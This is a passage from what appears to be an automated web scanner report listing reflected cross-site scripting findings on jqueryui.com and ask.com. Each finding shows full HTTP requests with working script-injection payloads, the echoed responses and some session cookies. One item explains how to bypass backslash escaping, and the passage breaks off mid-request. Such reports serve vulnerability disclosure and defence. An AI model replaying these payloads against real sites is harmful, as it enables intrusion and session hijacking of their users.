GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2pxa3efe"><script>alert(1)</script>2f5dc1da704&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2pxa3efe"><script>alert(1)</script>2f5dc1da704&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.67. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac264"><script>alert(1)</script>4256cccd365 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxac264"><script>alert(1)</script>4256cccd365&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxac264"><script>alert(1)</script>4256cccd365&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.68. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d0f5"><script>alert(1)</script>ac92bb32d23 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=354d0f5"><script>alert(1)</script>ac92bb32d23&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=354d0f5"><script>alert(1)</script>ac92bb32d23&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" med
...[SNIP]...

3.69. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8712f"><script>alert(1)</script>835a86cc92c was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=1008712f"><script>alert(1)</script>835a86cc92c&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
conColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=1008712f"><script>alert(1)</script>835a86cc92c&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.70. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc910"><script>alert(1)</script>7e405cdb2cd was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2pxfc910"><script>alert(1)</script>7e405cdb2cd&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2pxfc910"><script>alert(1)</script>7e405cdb2cd&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.71. http://ss.ask.com/query [fn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ss.ask.com
Path:   /query

Issue detail

The value of the fn request parameter is copied into the HTML document as plain text between tags. The payload 35a86<script>alert(1)</script>8f46cab7f1f was submitted in the fn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /query?sstype=prefix&fn=searchSuggestion35a86<script>alert(1)</script>8f46cab7f1f&q=re&limit=8&timestamp=1296155610067 HTTP/1.1
Host: ss.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:34:13 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 611
Content-Type: text/javascript

searchSuggestion35a86<script>alert(1)</script>8f46cab7f1f(["re",
["<span class=\\\"suggest\\\">re</span>d jacket firearms","<span class=\\\"suggest\\\">re</span>ed hastings","<span class=\\\"suggest\
...[SNIP]...

3.72. http://ss.ask.com/query [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ss.ask.com
Path:   /query

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload cb349<script>alert(1)</script>6fcc1d3815a was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /query?sstype=prefix&fn=searchSuggestion&q=recb349<script>alert(1)</script>6fcc1d3815a&limit=8&timestamp=1296155610067 HTTP/1.1
Host: ss.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:34:19 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 71
Content-Type: text/javascript

searchSuggestion(["recb349<script>alert(1)</script>6fcc1d3815a",
[]]);

3.73. http://www.ask.com/ans [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ans

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75dda'%3balert(1)//6d6e34d3af8 was submitted in the l parameter. This input was echoed as 75dda';alert(1)//6d6e34d3af8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ans?qsrc=&o=0&l=dir75dda'%3balert(1)//6d6e34d3af8&q=regulator+boat HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:47:36 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir75dda';alert(1)//6d6e34d3af8"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ3OjM2LVVUQw%3D%3D&po=0&pp=dir75dda%27%3Balert%281%29%2F%2F6d6e34d3af8; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:36 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:36 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:36 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 173673


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>
<head>


<title>



...[SNIP]...
<script type="text/javascript">
var qstr = 'q=regulator+boat&o=0&l=dir75dda';alert(1)//6d6e34d3af8&jss=1';
window.location = 'http://www.ask.com/ans?'+ qstr;
</script>
...[SNIP]...

3.74. http://www.ask.com/pictures [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1afd7'%3balert(1)//178827696e9 was submitted in the l parameter. This input was echoed as 1afd7';alert(1)//178827696e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictures?qsrc=167&o=0&l=dir1afd7'%3balert(1)//178827696e9&q=regulator+boat&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:36 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir1afd7';alert(1)//178827696e9"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjM2LVVUQw%3D%3D&po=0&pp=dir1afd7%27%3Balert%281%29%2F%2F178827696e9; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:36 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:36 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 123748


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...



var _matchUrl = '/afc-match?q=regulator+boat&page=1&ac=1082&qid=AE64B4C82E8A9CAB1E99DED66206DAB7&qsrc=167&dm=all&qrt=2&lid=5490&o=0&l=dir1afd7';alert(1)//178827696e9';


_matchUrl+= "&userip=173.193.214.243";


_matchUrl+="&losid=a&locid=p&lodid=us";


...[SNIP]...

3.75. http://www.ask.com/pictures [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef4cb\'%3b4d01c24067b was submitted in the q parameter. This input was echoed as ef4cb\\';4d01c24067b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /pictures?qsrc=167&o=0&l=dir&q=regulator+boatef4cb\'%3b4d01c24067b&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
